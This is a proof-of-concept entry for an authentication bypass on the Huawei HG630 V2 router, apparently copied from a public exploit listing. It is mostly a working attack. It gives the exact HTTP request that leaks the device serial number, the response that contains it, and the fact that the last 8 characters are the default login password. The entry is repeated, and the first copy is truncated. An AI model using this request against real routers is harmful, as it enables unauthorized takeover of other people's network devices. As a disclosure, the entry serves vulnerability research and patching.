VULHUB ™

``` # Title: Huawei HG630 2 Router - Authentication Bypass # Date: 2020-04-13 # Author: Eslam Medhat # Vendor Homepage: www.huawei.com # Version: HG630 V2 # HardwareVersion: VER.B # CVE: N/A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm...

``` # Title: Huawei HG630 2 Router - Authentication Bypass # Date: 2020-04-13 # Author: Eslam Medhat # Vendor Homepage: www.huawei.com # Version: HG630 V2 # HardwareVersion: VER.B # CVE: N/A #POC: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device. An attacker can leak the serial number via the web app API like the following: ************************Request************************ GET /api/system/deviceinfo HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.1/ X-Requested-With: XMLHttpRequest Connection: close Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm ************************Response************************ HTTP/1.1 200 OK Cache-Control: no-cache, no-store, max-age=0, must-revalidate X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Date: Fri, 01 Jan 2010 09:14:47 GMT Connection: Keep-Alive Content-Language: en Content-Type: application/javascript Content-Length: 141 while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ You can use that serial number to login to the router. #Reference: https://www.youtube.com/watch?v=vOrIL7L_cVc ```